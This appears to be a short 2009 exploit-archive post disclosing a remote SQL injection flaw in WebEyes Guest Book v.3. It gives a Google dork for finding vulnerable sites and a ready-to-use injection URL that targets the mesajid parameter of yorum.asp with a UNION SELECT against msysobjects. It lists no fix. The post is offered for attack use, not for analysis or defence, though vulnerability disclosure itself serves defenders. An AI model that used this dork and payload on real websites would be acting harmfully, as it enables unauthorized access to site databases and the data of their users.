WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability

2009-06-02 00:04:57

000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000


(
[+] Script : WEBEYES GUEST BOOK v.3

[+] Exploit Type : Remote sql injection exploit

[+] Google Dork : intitle:WEBEYES GUEST BOOK inurl:.asp?id=

[+] Contact : blackbeard-sql A.T hotmail.fr

--//--> Exploit :

Remote sql injection Exploit :

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects

[peace xD]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.